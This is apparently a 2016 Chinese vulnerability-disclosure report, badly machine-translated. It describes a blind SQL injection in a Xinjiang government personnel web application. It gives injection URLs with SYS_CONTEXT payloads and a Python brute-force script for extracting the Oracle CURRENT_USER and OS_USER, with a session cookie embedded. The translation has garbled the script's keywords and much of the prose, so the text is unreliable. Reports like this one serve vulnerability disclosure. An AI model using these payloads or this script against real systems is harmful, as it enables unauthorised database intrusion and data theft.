漏洞标题 新疆人民办公厅甲骨文盲人（附验证脚本） 相关制造商 新疆维吾尔自治区人力资源和社会保障厅 漏洞作者 鬼 提交时间 2016-04-29 19: 20 公共时间 2016-06-19 19: 40 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构（cncert National Internet Emergency Center） 标签标签 漏洞详细信息 注射地址： http://**。**。**。**/wcm/cm_ly/goToLycont.action？fhtype=1＆amp; id=8a4ac70250f05d9e0151590e127808da'和长度（SYS_CONTEXT（'USERENV'，'CURRENT_USER'））=3 AND'xxx'=“XXX 参数id过滤不严格，导致SQLi http://**。**。**。**/wcm/cm_ly/goToLycont.action？fhtype=1＆amp; id=8a4ac70250f05d9e0151590e127808da'和长度（SYS_CONTEXT（'USERENV'，'CURRENT_USER'））=3 AND'xxx'=“XXX 恢复正常

http://**。**。**。**/wcm/cm_ly/goToLycont.action？fhtype=1＆amp; id=8a4ac70250f05d9e0151590e127808da'和长度（SYS_CONTEXT（'USERENV'，'CURRENT_USER'））=4 AND'xxx'=“XXX

返回不一样，判断用户名是3个字符 将它直接放入脚本中运行。以下是CURRENT_USER和OS_USER的示例，其他类似 ＃！/usr/bin/env python ＃ - * - 编码: utf-8 - * - ＃@Author: 导入请求 Url='http://**。**。**。**/wcm/cm_ly/goToLycont.action？fhtype=1＆amp; id=8a4ac70250f05d9e0151590e127808da' 有效载荷='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789 @ _'。 标头={ 'User-Agent':'Mozilla/5.0（Windows NT 6.1; WOW64; rv: 45.0）Gecko/20100101 Firefox/45.0'， 'Cookie':'JSESSIONID=5V1JXjMpQLtR92RxJ62KrMQLfY4t6xpdQCBfcXLHtT2yz4jsT7Gr！1478879510'， '接受':'' } Def getData（）: 用户=“” 对于范围（1,4,1）:中的i 对于exp列表（有效负载）: 试试: Payload=''AND substr（SYS_CONTEXT（'USERENV'，'CURRENT_USER'），％s，1）='％s'和'xxx'='xxx'％（i，''。join（exp）） r=requests.get（url + payload，headers=header，allow_redirects=False，timeout=100） Res=r.text #print exp 如果res.find（'20151130234113'）＆gt; 0: 用户+=EXP 用户，打印'\ n用户是:' 除了: 通过 打印'\ n [完成] Oracle用户是％s'％用户 Def getDataBase（）: 用户=“” 对于范围（0,13,1）:中的i 对于exp列表（有效负载）: 试试: Payload=''AND substr（SYS_CONTEXT（'USERENV'，'OS_USER'），％s，1）='％s'和'xxx'='xxx'％（i，''。join（exp）） r=requests.get（url + payload，headers=header，allow_redirects=False，timeout=100） Res=r.text #print exp 如果res.find（'20151130234113'）＆gt; 0: 用户+=EXP 用户打印'\ n OS_USER为:' 除了: 通过 打印'\ n [完成] Oracle OS_USER是％s'％用户 如果__name__=='__ main__': #len=getLength（） 的getData（） getDataBase（） 验证结果：

漏洞证明：

修理计划： 版权声明：转载请注明出处Ghost @乌云